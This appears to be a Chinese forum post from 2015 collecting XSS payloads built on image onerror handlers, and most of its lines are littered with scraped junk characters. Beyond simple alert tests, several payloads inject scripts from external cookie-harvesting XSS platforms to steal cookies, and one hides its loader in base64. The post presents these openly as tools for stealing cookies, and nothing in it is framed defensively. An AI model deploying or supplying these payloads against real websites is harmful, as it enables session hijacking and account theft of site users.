<img src='non-exist.jpg'onerror="alert('xss')">! _( R9 x- H) Q0 l" K& c
<img src=# onerror=alert(123)>
2 ~" D$ n- I: E. |0 ~<img src=# onerror=alert(document.cookie)>
2 E$ |$ c) y5 l. X* a下面是利用平台钓cookie的
" |2 x3 R% r* Q4 d; \ p5 B <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
$ p$ S( W: e2 P
+ X6 s# l4 H$ w2 i, \# i! }. |: y6 [" @+ S2 i$ s, J
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>9 m+ c ^# c! s& M
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
: j6 M. f3 m) ]# N" `9 {7 z4 @! W“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>! u0 c' D A$ S% U
<img src=1 onerror=jQuery.getScript("//xss.re/974")> ) `- _: e$ Y( V# E# O E
<img src="#">
$ V1 u( _2 M+ Q' @<img src="#">
4 ]% ]/ W4 W) d8 ^<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>. ]/ U; C; _. ^ P) C4 B
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
1 Q4 U$ Q+ [ D- V3 D6 [<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>9 f( P' N0 F% ^( Q1 w. w7 b
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>* L, P0 s8 r; ?- ^& Z" g, q* W
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
2 W3 K% b- t7 K- h9 Z<img src=x width="0" height="0"></img>9 n. X; `) O* n, B6 Z+ N9 O
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>* z1 A9 E/ X4 @1 c. |% r) T
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>3 X4 P7 ]" J }5 k$ `8 i
|
发表于 2015-10-18 14:33:54
收藏
支持
反对